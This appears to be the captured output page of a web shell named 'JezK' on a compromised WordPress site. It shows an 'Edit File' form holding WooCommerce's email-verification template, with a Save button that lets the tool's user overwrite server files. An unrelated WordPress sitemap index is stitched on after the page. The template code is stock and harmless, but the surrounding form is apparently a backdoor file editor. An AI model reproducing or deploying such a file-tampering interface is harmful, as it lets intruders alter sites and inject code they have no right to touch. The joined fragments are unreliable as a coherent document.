
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: form-verify-email.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Email verification page.
 *
 * This displays instead of the thankyou page any time that the customer cannot be identified.
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/checkout/thankyou-verify-email.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you (the theme developer) will need to copy
 * the new files to your theme to maintain compatibility. We try to do this as little as possible, but it does happen.
 * When this occurs the version of the template file will be bumped and the readme will list any important changes.
 *
 * @see     https://woo.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 7.9.0
 *
 * @var bool   $failed_submission Indicates if the last attempt to verify failed.
 * @var string $verify_url        The URL for the email verification form.
 */

defined( &#039;ABSPATH&#039; ) || exit;
?&gt;
&lt;form name=&quot;checkout&quot; method=&quot;post&quot; class=&quot;woocommerce-form woocommerce-verify-email&quot; action=&quot;&lt;?php echo esc_url( $verify_url ); ?&gt;&quot; enctype=&quot;multipart/form-data&quot;&gt;

	&lt;?php
	wp_nonce_field( &#039;wc_verify_email&#039;, &#039;check_submission&#039; );

	if ( $failed_submission ) {
		wc_print_notice( esc_html__( &#039;We were unable to verify the email address you provided. Please try again.&#039;, &#039;woocommerce&#039; ), &#039;error&#039; );
	}
	?&gt;
	&lt;p&gt;
		&lt;?php
		printf(
			/* translators: 1: opening login link 2: closing login link */
			esc_html__( &#039;To view this page, you must either %1$slogin%2$s or verify the email address associated with the order.&#039;, &#039;woocommerce&#039; ),
			&#039;&lt;a href=&quot;&#039; . esc_url( wc_get_page_permalink( &#039;myaccount&#039; ) ) . &#039;&quot;&gt;&#039;,
			&#039;&lt;/a&gt;&#039;
		);
		?&gt;
	&lt;/p&gt;

	&lt;p class=&quot;form-row&quot;&gt;
		&lt;label for=&quot;email&quot;&gt;&lt;?php esc_html_e( &#039;Email address&#039;, &#039;woocommerce&#039; ); ?&gt;&amp;nbsp;&lt;span class=&quot;required&quot;&gt;*&lt;/span&gt;&lt;/label&gt;
		&lt;input type=&quot;email&quot; class=&quot;input-text&quot; name=&quot;email&quot; id=&quot;email&quot; autocomplete=&quot;email&quot; /&gt;
	&lt;/p&gt;

	&lt;p class=&quot;form-row&quot;&gt;
		&lt;button type=&quot;submit&quot; class=&quot;woocommerce-button button &lt;?php echo esc_attr( wc_wp_theme_get_element_class_name( &#039;button&#039; ) ); ?&gt;&quot; name=&quot;verify&quot; value=&quot;1&quot;&gt;
			&lt;?php esc_html_e( &#039;Verify&#039;, &#039;woocommerce&#039; ); ?&gt;
		&lt;/button&gt;
	&lt;/p&gt;
&lt;/form&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
